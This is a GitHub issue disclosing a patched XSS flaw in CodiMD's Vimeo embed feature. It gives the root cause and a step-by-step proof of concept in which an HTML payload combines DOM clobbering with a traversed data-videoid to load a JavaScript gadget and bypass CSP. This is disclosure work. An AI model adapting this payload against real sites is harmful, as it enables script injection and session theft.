codimd icon indicating copy to clipboard operation
codimd copied to clipboard

Published 20 hours ago verified publisher icon hackmdio

XSS Vulnerability in Embeding Vimeo Video Feature

Open splitline opened this issue 3 years ago • 0 comments
trafficstars

This issue has been reported to HackMD and has been patched on hackmd.io.

Root Cause

It doesn't check data-videoid attribute at all, and directly concat it into the JSONP URL. In this way we can load arbitrary file under https://vimeo.com as JavaScript, which might cause XSS.

https://github.com/hackmdio/codimd/blob/e7a5ea813ab684f5c9569dcee3423dd9c442b9bd/public/js/extra.js#L318-L329

PoC

Step 1. Create a note with content alert(document.domain);, and

Step 2. Create a note with the following content:

<!-- DOM clobbering + CSP Byapss  -->
<img src="/<note-id-created-in-step-1>/download" id="_zxcvbnSettings">
<!-- load gadget  -->
<div class="vimeo raw" data-videoid="../../../blog/wp-includes/js/zxcvbn-async.js#"></div>

Step 3. View it and trigger the XSS!

Technical Detail (Chinese): https://blog.splitline.tw/hackmd-xss/

splitline avatar Sep 02 '22 15:09 splitline